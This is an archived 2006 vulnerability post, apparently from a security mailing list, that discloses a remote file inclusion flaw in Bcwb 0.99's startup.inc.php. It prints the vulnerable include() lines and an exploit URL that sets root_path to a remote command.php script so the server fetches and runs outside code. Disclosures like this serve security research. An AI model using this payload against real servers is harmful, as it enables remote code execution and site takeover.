Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA22005] Qualiteam X-Cart cmpi.php Variable Overwriting Vulnerability

[SA21911] BizDirectory "message" Cross-Site Scripting Vulnerability

[SA22013] ECardPro "keyword" SQL Injection Vulnerability

[SA21988] CMtextS admin.txt Password Disclosure

From:	ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:	20.09.2006
Subject:	Bcwb 0.99(root_path)Remote File Include Vulnerability

*******************************************************************************
# Title  :  Bcwb 0.99(root_path)Remote File Include Vulnerability

# Author :   ajann

# Greetz :   shadow and Suskun for host : )

# Exploit;

*******************************************************************************
[File]
startup.inc.php
[/File]

[Code,1]
startup.inc.php Error:


..
....
// Debug services
include($root_path.'include/startup/debug.inc.php');
include($root_path.'include/startup/common_functions.inc.php');
include($root_path.'include/lib/data.lib.php');
....
..

Key [:] root_path=http://target.com/command.php?

\Example:

http://target.com/include/startup.inc.php?root_path=http://target.com/command.
php?

# ajann,Turkey
# ...
# Im not Hacker!